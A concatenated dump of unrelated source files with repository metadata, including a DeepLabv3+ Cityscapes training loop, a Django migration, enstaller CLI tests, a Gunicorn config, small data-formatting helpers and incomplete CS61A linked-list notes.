p['nAveGrad'] = 1  # Accumulate gradients over this many iterations
p['lr'] = 1e-7  # Learning rate
p['wd'] = 5e-4  # Weight decay
p['momentum'] = 0.9  # Momentum
p['epoch_size'] = 10  # How many epochs between learning-rate updates
backbone = 'xception'  # Feature extractor: 'xception' or 'resnet'

# Run directories: run/run_<id>, where <id> is the latest run when resuming
# or the next free id for a fresh run.
save_dir_root = os.path.join(os.path.dirname(os.path.abspath(__file__)))
exp_name = os.path.dirname(os.path.abspath(__file__)).split('/')[-1]

if resume_epoch != 0:
    runs = sorted(glob.glob(os.path.join(save_dir_root, 'run', 'run_*')))
    run_id = int(runs[-1].split('_')[-1]) if runs else 0
else:
    runs = sorted(glob.glob(os.path.join(save_dir_root, 'run', 'run_*')))
    run_id = int(runs[-1].split('_')[-1]) + 1 if runs else 0

save_dir = os.path.join(save_dir_root, 'run', 'run_' + str(run_id))

# ---- Network definition (19 Cityscapes classes, output stride 16) --------
if backbone == 'xception':
    net = deeplab_xception.DeepLabv3_plus(nInputChannels=3, n_classes=19, os=16, pretrained=True)
elif backbone == 'resnet':
    net = deeplab_resnet.DeepLabv3_plus(nInputChannels=3, n_classes=19, os=16, pretrained=True)
else:
    raise NotImplementedError

modelName = 'deeplabv3plus-' + backbone + '-cityscapes'
criterion = utils.cross_entropy2d
# Either start from scratch or restore weights from the previous epoch's
# checkpoint in <save_dir>/models/.
if resume_epoch == 0:
    print("Training deeplabv3+ from scratch...")
else:
    print("Initializing weights from: {}...".format(
        os.path.join(save_dir, 'models', modelName + '_epoch-' + str(resume_epoch - 1) + '.pth')))
    net.load_state_dict(
        torch.load(os.path.join(save_dir, 'models', modelName + '_epoch-' + str(resume_epoch - 1) + '.pth'),
                   map_location=lambda storage, loc: storage))  # load all tensors onto the CPU first

if gpu_id >= 0:
    torch.cuda.set_device(device=gpu_id)
    net.cuda()
if resume_epoch != nEpochs:
    # Logging into Tensorboard
    log_dir = os.path.join(save_dir, 'models', datetime.now().strftime('%b%d_%H-%M-%S') + '_' + socket.gethostname())
    writer = SummaryWriter(log_dir=log_dir)

    # SGD optimizer; recreated later whenever the poly LR schedule fires.
    optimizer = optim.SGD(net.parameters(), lr=p['lr'], momentum=p['momentum'], weight_decay=p['wd'])
    p['optimizer'] = str(optimizer)

    # Data augmentation for training; deterministic-ish resizing for eval.
    composed_transforms_tr = transforms.Compose([
        tr.RandomHorizontalFlip(),
        tr.RandomScale((0.5, 0.75)),
        tr.RandomCrop((512, 1024)),
        tr.RandomRotate(5),
        tr.Normalize_cityscapes(mean=(72.39, 82.91, 73.16)),
        tr.ToTensor()])

    composed_transforms_ts = transforms.Compose([
        tr.RandomHorizontalFlip(),
        tr.Scale((819, 1638)),
        tr.CenterCrop((512, 1024)),
        tr.Normalize_cityscapes(mean=(72.39, 82.91, 73.16)),
        tr.ToTensor()])

    cityscapes_train = cityscapes.CityscapesSegmentation(split='train',
                                                         transform=composed_transforms_tr)
    cityscapes_val = cityscapes.CityscapesSegmentation(split='val',
                                                       transform=composed_transforms_ts)
    cityscapes_test = cityscapes.CityscapesSegmentation(split='test',
                                                        transform=composed_transforms_ts)

    trainloader = DataLoader(cityscapes_train, batch_size=p['trainBatch'], shuffle=True, num_workers=0)
    valloader = DataLoader(cityscapes_val, batch_size=testBatch, shuffle=True, num_workers=0)
    testloader = DataLoader(cityscapes_test, batch_size=testBatch, shuffle=False, num_workers=0)

    utils.generate_param_report(os.path.join(save_dir, exp_name + '.txt'), p)

    num_img_tr = len(trainloader)
    num_img_vl = len(valloader)
    num_img_ts = len(testloader)
    running_loss_tr = 0.0
    running_loss_vl = 0.0
    running_loss_ts = 0.0
    previous_miou = -1.0  # best validation mIoU seen so far (checkpoint gate)
    aveGrad = 0
    global_step = 0
    print("Training Network")

    # ---- Main training / validation loop ---------------------------------
    for epoch in range(resume_epoch, nEpochs):
        start_time = timeit.default_timer()

        # Poly learning-rate policy: rebuild the optimizer every epoch_size
        # epochs with the decayed rate.  NOTE(review): recreating the
        # optimizer also resets its momentum buffers — confirm intended.
        if epoch % p['epoch_size'] == p['epoch_size'] - 1:
            lr_ = utils.lr_poly(p['lr'], epoch, nEpochs, 0.9)
            print('(poly lr policy) learning rate: ', lr_)
            optimizer = optim.SGD(net.parameters(), lr=lr_, momentum=p['momentum'], weight_decay=p['wd'])

        net.train()
        for ii, sample_batched in enumerate(trainloader):

            inputs, labels = sample_batched['image'], sample_batched['label']
            # Forward-Backward of the mini-batch
            inputs, labels = Variable(inputs, requires_grad=True), Variable(labels)
            global_step += inputs.data.shape[0]

            if gpu_id >= 0:
                inputs, labels = inputs.cuda(), labels.cuda()

            outputs = net.forward(inputs)

            loss = criterion(outputs, labels, size_average=False, batch_average=True)
            running_loss_tr += loss.item()

            # Report the epoch-average training loss on the last batch.
            if ii % num_img_tr == (num_img_tr - 1):
                running_loss_tr = running_loss_tr / num_img_tr
                writer.add_scalar('data/total_loss_epoch', running_loss_tr, epoch)
                print('[Epoch: %d, numImages: %5d]' % (epoch, ii * p['trainBatch'] + inputs.data.shape[0]))
                print('Loss: %f' % running_loss_tr)
                running_loss_tr = 0
                stop_time = timeit.default_timer()
                print("Execution time: " + str(stop_time - start_time) + "\n")

            # Backward the averaged gradient
            loss /= p['nAveGrad']
            loss.backward()
            aveGrad += 1

            # Update the weights once in p['nAveGrad'] forward passes
            if aveGrad % p['nAveGrad'] == 0:
                writer.add_scalar('data/total_loss_iter', loss.item(), ii + num_img_tr * epoch)
                optimizer.step()
                optimizer.zero_grad()
                aveGrad = 0

            # Show 10 * 3 images results each epoch
            if ii % (num_img_tr // 10) == 0:
                grid_image = make_grid(inputs[:3].clone().cpu().data, 3, normalize=True)
                writer.add_image('Image', grid_image, global_step)
                grid_image = make_grid(
                    utils.decode_seg_map_sequence(torch.max(outputs[:3], 1)[1].detach().cpu().numpy(), 'cityscapes'), 3,
                    normalize=False,
                    range=(0, 255))
                writer.add_image('Predicted label', grid_image, global_step)
                grid_image = make_grid(
                    utils.decode_seg_map_sequence(torch.squeeze(labels[:3], 1).detach().cpu().numpy(), 'cityscapes'), 3,
                    normalize=False, range=(0, 255))
                writer.add_image('Groundtruth label', grid_image, global_step)

        # ---- Validation every nValInterval epochs -------------------------
        if epoch % nValInterval == (nValInterval - 1):
            total_miou = 0.0
            net.eval()
            for ii, sample_batched in enumerate(valloader):
                inputs, labels = sample_batched['image'], sample_batched['label']

                # Forward pass of the mini-batch
                inputs, labels = Variable(inputs, requires_grad=True), Variable(labels)
                if gpu_id >= 0:
                    inputs, labels = inputs.cuda(), labels.cuda()

                with torch.no_grad():
                    outputs = net.forward(inputs)

                predictions = torch.max(outputs, 1)[1]

                loss = criterion(outputs, labels, size_average=False, batch_average=True)
                running_loss_vl += loss.item()

                total_miou += utils.get_iou(predictions, labels, 19)

                # On the last batch: average metrics over the images seen.
                if ii % num_img_vl == num_img_vl - 1:
                    miou = total_miou / (ii * testBatch + inputs.data.shape[0])
                    running_loss_vl = running_loss_vl / num_img_vl

                    print('Validation:')
                    print('[Epoch: %d, numImages: %5d]' % (epoch, ii * testBatch + inputs.data.shape[0]))
                    writer.add_scalar('data/test_loss_epoch', running_loss_vl, epoch)
                    writer.add_scalar('data/test_miour', miou, epoch)
                    print('Loss: %f' % running_loss_vl)
                    print('MIoU: %f\n' % miou)
                    running_loss_vl = 0

                # Save the model
                # NOTE(review): this check runs on *every* val batch; for
                # ii < last, `miou` still holds the previous evaluation's
                # value (or is undefined on the very first eval) — consider
                # moving this block after the loop.
                if (epoch % snapshot) == snapshot - 1 and miou > previous_miou:
                    previous_miou = miou
                    torch.save(net.state_dict(), os.path.join(save_dir, 'models', modelName + '_epoch-' + str(epoch) + '.pth'))
                    print("Save model at {}\n".format(
                        os.path.join(save_dir, 'models', modelName + '_epoch-' + str(epoch) + '.pth')))

    writer.close()

    # ---- Final pass over the test split after training --------------------
    if useTest:
        total_iou = 0.0
        net.eval()
        for ii, sample_batched in enumerate(testloader):
            inputs, labels = sample_batched['image'], sample_batched['label']

            # Forward pass of the mini-batch
            inputs, labels = Variable(inputs, requires_grad=True), Variable(labels)
            if gpu_id >= 0:
                inputs, labels = inputs.cuda(), labels.cuda()

            with torch.no_grad():
                outputs = net.forward(inputs)

            predictions = torch.max(outputs, 1)[1]

            loss = criterion(outputs, labels, size_average=False, batch_average=True)
            running_loss_ts += loss.item()

            total_iou += utils.get_iou(predictions, labels, 19)

            # Print stuff
            if ii % num_img_ts == num_img_ts - 1:
                miou = total_iou / (ii * testBatch + inputs.data.shape[0])
                running_loss_ts = running_loss_ts / num_img_ts

                print('Test:')
                print('Loss: %f' % running_loss_ts)
                print('MIoU: %f\n' % miou)
                running_loss_ts = 0
| [
"jessezhjf@gmail.com"
] | jessezhjf@gmail.com |
9afd74e8b3a365c8442f1b8b0128e5d4de5e808e | 4eb3e8d29150aa57e6036bc7ca6fcbe169e08c26 | /records/migrations/0013_record_cover_file.py | 8e298e3293b26aa848c7c4f2a9db9d63dd144316 | [] | no_license | GustavAndreasson/records2 | 5b141d7912a2faa40dc9f17d90d5e4e90c249852 | b898c7ed5f8bd652a57facceaa5d2f409c47553d | refs/heads/master | 2023-05-12T16:27:28.602123 | 2023-02-13T19:27:03 | 2023-02-13T19:27:03 | 176,073,447 | 1 | 0 | null | 2023-09-09T15:22:35 | 2019-03-17T08:12:10 | JavaScript | UTF-8 | Python | false | false | 426 | py | # Generated by Django 3.2.10 on 2022-01-28 19:20
from django.db import migrations, models
class Migration(migrations.Migration):
    """Schema migration: add an optional ``cover_file`` image to ``Record``."""

    # Must be applied after migration 0012 of the ``records`` app.
    dependencies = [
        ('records', '0012_auto_20220118_1803'),
    ]

    operations = [
        # Nullable/blank so existing rows need no default cover image.
        migrations.AddField(
            model_name='record',
            name='cover_file',
            field=models.ImageField(blank=True, null=True, upload_to='records/covers'),
        ),
    ]
| [
"gustav.andreasson@gmail.com"
] | gustav.andreasson@gmail.com |
a64f0f99c0ebcacedc4e8efb592d1f75480fcd7c | 0e25329bb101eb7280a34f650f9bd66ed002bfc8 | /tests/functional/test_misc.py | 5da0c776cf8bde4c5a1a3dc58331fff08885b9f3 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | enthought/enstaller | 2a2d433a3b83bcf9b4e3eaad59d952c531f36566 | 9c9f1a7ce58358b89352f4d82b15f51fbbdffe82 | refs/heads/master | 2023-08-08T02:30:26.990190 | 2016-01-22T17:51:35 | 2016-01-22T17:51:35 | 17,997,072 | 3 | 4 | null | 2017-01-13T19:22:10 | 2014-03-21T23:03:58 | Python | UTF-8 | Python | false | false | 7,200 | py | import json
import os.path
import platform
import shutil
import sys
import tempfile
import textwrap
import mock
import responses
from enstaller import __version__
from enstaller.config import Configuration
from enstaller.history import History
from enstaller.main import main_noexc
from enstaller.utils import PY_VER
from enstaller.tests.common import authenticated_config, mock_index, mock_print, R_JSON_AUTH_RESP
if sys.version_info[0] == 2:
import unittest2 as unittest
else:
import unittest
class TestMisc(unittest.TestCase):
    """CLI-level tests for enstaller's informational flags.

    Each test drives ``main_noexc`` with a flag, expects it to exit with
    code 0 (``SystemExit``), and checks the captured stdout.  Network calls
    are intercepted with ``responses``; project internals with ``mock``.
    """

    @authenticated_config
    @responses.activate
    def test_print_config(self):
        # `--config` should print the full settings report for an
        # authenticated user, byte-for-byte.
        self.maxDiff = None

        # Given
        config = Configuration()
        config.update(prefix=sys.prefix)

        template = textwrap.dedent("""\
            Python version: {pyver}
            enstaller version: {version}
            sys.prefix: {sys_prefix}
            platform: {platform}
            architecture: {arch}
            use_webservice: True
            settings:
                prefix = {prefix}
                repository_cache = {repository_cache}
                noapp = False
                proxy = None
            You are logged in as 'dummy' (David Cournapeau).
            Subscription level: Canopy / EPD Basic or above
            """)
        r_output = template.format(pyver=PY_VER,
                                   sys_prefix=os.path.normpath(sys.prefix),
                                   version=__version__,
                                   platform=platform.platform(),
                                   arch=platform.architecture()[0],
                                   prefix=os.path.normpath(config.prefix),
                                   repository_cache=config.repository_cache)

        responses.add(responses.GET,
                      "https://api.enthought.com/accounts/user/info/",
                      body=json.dumps(R_JSON_AUTH_RESP))

        # When
        with self.assertRaises(SystemExit) as e:
            with mock_print() as m:
                main_noexc(["--config"])

        # Then
        self.assertEqual(e.exception.code, 0)
        self.assertMultiLineEqual(m.value, r_output)

    @authenticated_config
    def test_list_bare(self):
        # `--list` prints the active prefix header (the package listing
        # itself is stubbed out).
        # Given
        sys_prefix = os.path.normpath(sys.prefix)

        # When
        with mock.patch("enstaller.cli.commands.print_installed"):
            with self.assertRaises(SystemExit) as e:
                with mock_print() as m:
                    main_noexc(["--list"])

        # Then
        self.assertEqual(e.exception.code, 0)
        self.assertMultiLineEqual(m.value, "prefix: {0}\n\n".format(sys_prefix))

    @authenticated_config
    def test_log(self):
        # `--log` delegates to History.print_log and prints nothing itself.
        with mock.patch("enstaller.cli.commands.History",
                        spec=History) as mocked_history:
            with self.assertRaises(SystemExit) as e:
                with mock_print() as m:
                    main_noexc(["--log"])
            self.assertEqual(e.exception.code, 0)
            self.assertTrue(mocked_history.return_value.print_log.called)
            self.assertMultiLineEqual(m.value, "")

    @authenticated_config
    def test_freeze(self):
        # `--freeze` prints one requirement per line.
        installed_requirements = ["dummy 1.0.0-1", "another_dummy 1.0.1-1"]
        with mock.patch("enstaller.cli.commands.get_freeze_list",
                        return_value=installed_requirements):
            with self.assertRaises(SystemExit) as e:
                with mock_print() as m:
                    main_noexc(["--freeze"])
            self.assertEqual(e.exception.code, 0)
            self.assertMultiLineEqual(m.value,
                                      "dummy 1.0.0-1\nanother_dummy 1.0.1-1\n")

    @mock_index({
        "fubar-1.0.0-1.egg": {
            "available": True,
            "build": 1,
            "md5": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
            "mtime": 0.0,
            "name": "fubar",
            "packages": [],
            "product": "nono",
            "python": PY_VER,
            "size": 0,
            "type": "egg",
            "version": "1.0.0"
        }}, "https://acme.com")
    def test_insecure_flag(self):
        # A search works both with and without `-k` (insecure/no-SSL-verify).
        # Given
        responses.add(responses.GET,
                      "https://acme.com/accounts/user/info/",
                      body=json.dumps(R_JSON_AUTH_RESP))

        config = Configuration()
        config.update(store_url="https://acme.com")
        config.update(auth=("nono", "le gros robot"))

        # When
        with self.assertRaises(SystemExit) as e:
            with mock.patch("enstaller.main._ensure_config_or_die",
                            return_value=config):
                with mock.patch(
                    "enstaller.main.ensure_authenticated_config"
                ):
                    main_noexc(["-s", "fubar"])

        # Then
        self.assertEqual(e.exception.code, 0)

        # When
        with self.assertRaises(SystemExit) as e:
            with mock.patch("enstaller.main._ensure_config_or_die",
                            return_value=config):
                with mock.patch(
                    "enstaller.main.ensure_authenticated_config"
                ):
                    main_noexc(["-ks", "fubar"])

        # Then
        self.assertEqual(e.exception.code, 0)
class TestPrefix(unittest.TestCase):
    """Tests for the `--prefix` CLI option using a throw-away directory."""

    def setUp(self):
        # Fresh temporary prefix for every test.
        self.prefix = tempfile.mkdtemp()

    def tearDown(self):
        shutil.rmtree(self.prefix)

    @authenticated_config
    @mock_index({
        "fubar-1.0.0-1.egg": {
            "available": True,
            "build": 1,
            "md5": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
            "mtime": 0.0,
            "name": "fubar",
            "packages": [],
            "product": "nono",
            "python": PY_VER,
            "size": 0,
            "type": "egg",
            "version": "1.0.0"
        }}, "https://api.enthought.com")
    def test_simple(self):
        # `--config --prefix=X` must report X (and X/LOCAL-REPO as cache)
        # instead of the interpreter's own prefix.
        self.maxDiff = None

        # Given
        responses.add(responses.GET,
                      "https://api.enthought.com/accounts/user/info/",
                      body=json.dumps(R_JSON_AUTH_RESP))
        template = textwrap.dedent("""\
            Python version: {pyver}
            enstaller version: {version}
            sys.prefix: {sys_prefix}
            platform: {platform}
            architecture: {arch}
            use_webservice: True
            settings:
                prefix = {prefix}
                repository_cache = {repository_cache}
                noapp = False
                proxy = None
            You are logged in as 'dummy' (David Cournapeau).
            Subscription level: Canopy / EPD Basic or above
            """)
        r_output = template.format(pyver=PY_VER,
                                   sys_prefix=os.path.normpath(sys.prefix),
                                   version=__version__,
                                   platform=platform.platform(),
                                   arch=platform.architecture()[0],
                                   prefix=os.path.normpath(self.prefix),
                                   repository_cache=os.path.join(self.prefix,
                                                                 "LOCAL-REPO"))

        # When
        with self.assertRaises(SystemExit):
            with mock_print() as m:
                main_noexc(["--config", "--prefix={0}".format(self.prefix)])

        # Then
        self.assertEqual(m.value, r_output)
| [
"cournape@gmail.com"
] | cournape@gmail.com |
f9fd59e42615ba9ba02c202ac091a413ca692229 | 6a07d4c96f6011c025810cd4059a3d47c60948e3 | /cap5/identificar_elementos_duplicados_em_vetor.py | 7c55c18e554d90d1c3bde4490840e7255a9ace5e | [] | no_license | redbillb/devfuria | a16e2f4dd661d42eead279f645aca3f4057623c8 | cf3c1565b8e85418acab5ca5c11576502cc63566 | refs/heads/master | 2020-03-23T15:39:01.713588 | 2018-08-28T22:15:37 | 2018-08-28T22:15:37 | 141,764,363 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | # -*- coding: utf-8 -*-
#imports
#processamento
def ahDuplicidade(vetor):
    """Return True if *vetor* contains at least one repeated element.

    Elements are compared with ``==`` (so unhashable elements still work,
    matching the original behavior).  Unlike the original implementation,
    the scan stops as soon as the first duplicate pair is found instead of
    always examining every remaining pair.
    """
    for indice, elemento in enumerate(vetor):
        # Only compare against the elements that come after `elemento`;
        # earlier pairs were already checked in previous iterations.
        for outro in vetor[indice + 1:]:
            if outro == elemento:
                return True
    return False
return resultado
#testes
assert ahDuplicidade([100, 200, 300, 300, 400])
assert not ahDuplicidade([100, 200, 300, 400]) | [
"redbillb@gmail.com"
] | redbillb@gmail.com |
66126674f51734a6eecd06e9abdf48bdc490a413 | 63c9111bbeadea8d6313dbca5853b8203ffbda21 | /templates/data/gunicorn.production.conf.py | d13a36301f39a5533a004f0f91f075671296787f | [] | no_license | heavenshell/py-gene-script | 453969279fe45d1f3d94ee10711a6bf7e35b2ea2 | 912941406a1bc54139b2347cb748940a055cdd05 | refs/heads/master | 2020-12-24T06:30:22.603432 | 2017-07-16T21:05:37 | 2017-07-16T21:05:37 | 40,977,353 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,398 | py | import os
import multiprocessing
# Sample Gunicorn configuration file.
#
# Server socket
#
# bind - The socket to bind.
#
# A string of the form: 'HOST', 'HOST:PORT', 'unix:PATH'.
# An IP is a valid HOST.
#
# backlog - The number of pending connections. This refers
# to the number of clients that can be waiting to be
# served. Exceeding this number results in the client
# getting an error when attempting to connect. It should
# only affect servers under significant load.
#
# Must be a positive integer. Generally set in the 64-2048
# range.
#
bind = '127.0.0.1:8000'
backlog = 2048
#
# Worker processes
#
# workers - The number of worker processes that this server
# should keep alive for handling requests.
#
# A positive integer generally in the 2-4 x $(NUM_CORES)
# range. You'll want to vary this a bit to find the best
# for your particular application's work load.
#
# worker_class - The type of workers to use. The default
# async class should handle most 'normal' types of work
# loads. You'll want to read http://gunicorn/deployment.hml
# for information on when you might want to choose one
# of the other worker classes.
#
# An string referring to a 'gunicorn.workers' entry point
# or a MODULE:CLASS pair where CLASS is a subclass of
# gunicorn.workers.base.Worker. The default provided values
# are:
#
# egg:gunicorn#sync
# egg:gunicorn#eventlet - Requires eventlet >= 0.9.7
# egg:gunicorn#gevent - Requires gevent >= 0.12.2 (?)
# egg:gunicorn#tornado - Requires tornado >= 0.2
#
# worker_connections - For the eventlet and gevent worker classes
# this limits the maximum number of simultaneous clients that
# a single process can handle.
#
# A positive integer generally set to around 1000.
#
# timeout - If a worker does not notify the master process in this
# number of seconds it is killed and a new worker is spawned
# to replace it.
#
# Generally set to thirty seconds. Only set this noticeably
# higher if you're sure of the repercussions for sync workers.
# For the non sync workers it just means that the worker
# process is still communicating and is not tied to the length
# of time required to handle a single request.
#
# keepalive - The number of seconds to wait for the next request
# on a Keep-Alive HTTP connection.
#
# A positive integer. Generally set in the 1-5 seconds range.
#
worker_class = 'egg:meinheld#gunicorn_worker'
workers = multiprocessing.cpu_count() * 2 + 1
worker_connections = 1000
timeout = 30
keepalive = 2
#
# Debugging
#
# debug - Turn on debugging in the server. This limits the number of
# worker processes to 1 and changes some error handling that's
# sent to clients.
#
# True or False
#
# spew - Install a trace function that spews every line of Python
# that is executed when running the server. This is the
# nuclear option.
#
# True or False
#
debug = False
spew = False
#
# Server mechanics
#
# daemon - Detach the main Gunicorn process from the controlling
# terminal with a standard fork/fork sequence.
#
# True or False
#
# pidfile - The path to a pid file to write
#
# A path string or None to not write a pid file.
#
# user - Switch worker processes to run as this user.
#
# A valid user id (as an integer) or the name of a user that
# can be retrieved with a call to pwd.getpwnam(value) or None
# to not change the worker process user.
#
# group - Switch worker process to run as this group.
#
# A valid group id (as an integer) or the name of a user that
# can be retrieved with a call to pwd.getgrnam(value) or None
# to change the worker processes group.
#
# umask - A mask for file permissions written by Gunicorn. Note that
# this affects unix socket permissions.
#
# A valid value for the os.umask(mode) call or a string
# compatible with int(value, 0) (0 means Python guesses
# the base, so values like "0", "0xFF", "0022" are valid
# for decimal, hex, and octal representations)
#
# tmp_upload_dir - A directory to store temporary request data when
# requests are read. This will most likely be disappearing soon.
#
# A path to a directory where the process owner can write. Or
# None to signal that Python should choose one on its own.
#
daemon = False
pidfile = None
umask = 0
user = None
group = None
tmp_upload_dir = None
#
# Logging
#
# logfile - The path to a log file to write to.
#
# A path string. "-" means log to stdout.
#
# loglevel - The granularity of log output
#
# A string of "debug", "info", "warning", "error", "critical"
#
logfile = '-'
loglevel = 'info'
root_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
log_path = os.path.join(root_path, 'logs')
accesslog = '-'
# accesslog = '{0}/access_log'.format(log_path)
# access_log_format = '"%(h)s %(l)s %(u)s [%(t)s] "%(r)s" %(s)s %(b)s "%(f)s" "%(a)s" "%(p)s" %(T)s %(D)s' # noqa
#
# Process naming
#
# proc_name - A base to use with setproctitle to change the way
# that Gunicorn processes are reported in the system process
# table. This affects things like 'ps' and 'top'. If you're
# going to be running more than one instance of Gunicorn you'll
# probably want to set a name to tell them apart. This requires
# that you install the setproctitle module.
#
# A string or None to choose a default of something like 'gunicorn'.
#
proc_name = None
#
# Server hooks
#
# post_fork - Called just after a worker has been forked.
#
# A callable that takes a server and worker instance
# as arguments.
#
# pre_fork - Called just prior to forking the worker subprocess.
#
# A callable that accepts the same arguments as after_fork
#
# pre_exec - Called just prior to forking off a secondary
# master process during things like config reloading.
#
# A callable that takes a server instance as the sole argument.
def post_fork(server, worker):
    # Called just after a worker has been forked; log the new worker's pid.
    server.log.info("Worker spawned (pid: %s)" % worker.pid)
def pre_fork(server, worker):
    # Called just before a worker is forked; intentionally a no-op here.
    pass
def pre_exec(server):
    # Called just before the master re-executes itself (e.g. config reload).
    server.log.info("Forked child, re-executing.")
| [
"heavenshell.jp@gmail.com"
] | heavenshell.jp@gmail.com |
6ffbc1fdd0bb94c69f961871e05b86e073a589d5 | e0ed932fc2e4edb953cc4e423362dabc19083008 | /python/sanic_learn/docs/learn_conf.py | 3b279281ff746c4e709cfdd6e544322a6b2da803 | [] | no_license | glfAdd/note | 90baee45003ac3998d898dcfbc618caa28f33b74 | 19a9aff61450be25904bff0fe672f660d49d90ff | refs/heads/main | 2023-05-27T13:28:36.092352 | 2023-05-24T03:35:58 | 2023-05-24T03:35:58 | 240,066,208 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | """ ============================ config
config对象实现两个__getattr__和__setattr__
方式1: 使用属性
app = Sanic('myapp')
app.config.DB_NAME = 'appdb'
app.config.DB_USER = 'appuser'
方式2: 使用update
db_settings = {
'DB_HOST': 'localhost',
'DB_NAME': 'appdb',
'DB_USER': 'appuser'
}
app.config.update(db_settings)
"""
| [
"2239660080@qq.com"
] | 2239660080@qq.com |
1f13d9477491556fd62ba54954608accdb6306a6 | fa6ec0272b6294023556d397c5d00b58bf7d922d | /apps.py | ee611e203020784edbd558eece0fde3ea36a7c1e | [] | no_license | ernestby/django-menu | e6ef6beddedcbd2041f7cbec8a67bf2133591b2a | 00cca6ca0ceb51e216d8c1532be0c66afd40429a | refs/heads/master | 2021-01-16T01:02:15.512270 | 2015-04-30T08:48:26 | 2015-04-30T08:48:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
class MenuConfig(AppConfig):
name = 'apps.menu'
label = 'tree_menu'
verbose_name = _('Menu')
| [
"stanislav@baltrunas.ru"
] | stanislav@baltrunas.ru |
8f0295c144b5b11a32f9c500b1e5ab6d61379ddf | 0acc183986e6ec1aff3e64fdd296766fbde5692f | /array_format.py | a45a318457e2695542f76e09a863fac7dd59ec3b | [] | no_license | kkinnard/Concussion-App-Data-Mining | 0347cb265cfcf593961f01339b2441dea5a63f1d | 87c1c65820b2b3a55552b7c5f5bbc93e82ede5ae | refs/heads/master | 2021-01-10T08:28:33.433319 | 2016-02-27T16:37:01 | 2016-02-27T16:37:01 | 43,262,564 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,122 | py | # Format the arrays to ints and the values that we are looking at.
#!/usr/bin/python
def cont_format(cont_list, cont_rows, cont_columns):
    """Convert the control-group CSV rows (strings) to a matrix of ints.

    Row 0 of `cont_list` is a header and is skipped.  Output row layout:
    column 0 = age (source column 2), column 1 = gender (source column 3),
    columns 2-9 = the answers stored in source columns 5-12.
    """
    formatted = [[0] * cont_columns for _ in range(cont_rows)]
    for row_idx in range(1, cont_rows + 1):
        source = cont_list[row_idx]
        target = formatted[row_idx - 1]
        target[0] = int(source[2])    # age
        target[1] = int(source[3])    # gender
        for col in range(2, 10):      # remaining fields, shifted by 3
            target[col] = int(source[col + 3])
    return formatted
def conc_format(conc_list, conc_rows, conc_columns):
    """Convert the concussed-group CSV rows (strings) to a matrix of ints.

    Same layout as cont_format, except gender lives in source column 4:
    column 0 = age (source column 2), column 1 = gender (source column 4),
    columns 2-9 = the answers stored in source columns 5-12.
    """
    formatted = [[0] * conc_columns for _ in range(conc_rows)]
    for row_idx in range(1, conc_rows + 1):
        source = conc_list[row_idx]
        target = formatted[row_idx - 1]
        target[0] = int(source[2])    # age
        target[1] = int(source[4])    # gender
        for col in range(2, 10):      # remaining fields, shifted by 3
            target[col] = int(source[col + 3])
    return formatted
| [
"amunch@nd.edu"
] | amunch@nd.edu |
af69d10cfc7875b0e05f73d045baae296ecc6cf3 | 9722af919f6660489c546811518f73a6285ef0b9 | /venv/bin/pip3.8 | fc299fae7ce1c3972abddd846a4850891a85e9a2 | [] | no_license | back-hub/parser_example | aadfaccde96a567f45fb29faf29f01ef774cffd5 | b8fdb8c6eb391e369c1d3cc907c2e3bd8d0e3b68 | refs/heads/master | 2023-06-02T00:38:40.922169 | 2021-06-17T04:50:51 | 2021-06-17T04:50:51 | 377,707,710 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | 8 | #!/home/backhub/PycharmProjects/dummy_parser/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
    # Strip the "-script.pyw" / ".exe" suffix that Windows console-script
    # launchers append to argv[0], then hand control to pip's CLI.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"tamirlan.akhmedov@gmail.com"
] | tamirlan.akhmedov@gmail.com |
466bfa3db237894b693ce15d8c0569041d91c0d5 | 667b7d744fff4d38933ae24077f3782adb6fd622 | /app/configs/migration.py | 8615445c2574bef2dec22f522074ae0d8583d3df | [] | no_license | CarlosMartorini/leads-crud | be549d084d3737749857f186d6650862102106b7 | 2a1f04b2db6c3f6723e5b098a83d22ff2409515e | refs/heads/master | 2023-08-11T20:08:10.629215 | 2021-09-26T21:34:16 | 2021-09-26T21:34:16 | 410,668,226 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 159 | py | from flask import Flask
from flask_migrate import Migrate
def init_app(app: Flask):
    """Register Flask-Migrate on *app* so `flask db` commands are available."""
    # Imported for its side effect only: loading the model module ensures the
    # Lead table is registered with SQLAlchemy's metadata before migrations.
    from app.models.leads_model import Lead
    Migrate(app, app.db)
"c7.silveira@gmail.com"
] | c7.silveira@gmail.com |
506f4f48d4a2d524e97a96b35887b2d6e92d429a | c6257bc16d47a585082dd9cb06894603037eae57 | /8.1-20.py | 85a480d57a6b090f219c894760aab1c1e96155a7 | [] | no_license | Letian-Wang/CS61A-Structure-and-Interpretation-of-Computer-Programs | 973ea917ad1f7dced92a1e140b0fb6db7ae04a30 | fd04be9f33c18f855e3cede46320b7cd0a811ee7 | refs/heads/master | 2022-10-24T05:26:45.411133 | 2020-06-14T08:08:48 | 2020-06-14T08:08:48 | 270,806,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 694 | py | ''' Linked list '''
Link(3, Link(4, Link(5, Link.empty)))
class Link:
    """A singly linked list: a first value plus the rest of the list."""

    # Sentinel shared by all lists to mark the end of the chain.
    empty = ()

    def __init__(self, first, rest=empty):
        # The tail must itself be a Link, or the end-of-list sentinel.
        assert rest is Link.empty or isinstance(rest, Link)
        self.first = first
        self.rest = rest
s = Link(3, Link(4, Link(5)))
s.first
s.rest.first
s.rest.rest.first
s.rest.rest.rest is Link.empty
s.rest.first = 7
Link(3, Link(7, Link(5)))
Link(8, s.rest)
''' Property methods '''
@property decorator
class Link:
@property
def second(self):
return self.rest.first
@second.setter
def second(self, value):
self.rest.first = value
''' Tree Class '''
Recursion description
Relative description
class Tree:
def
| [
"wangletian1995@126.com"
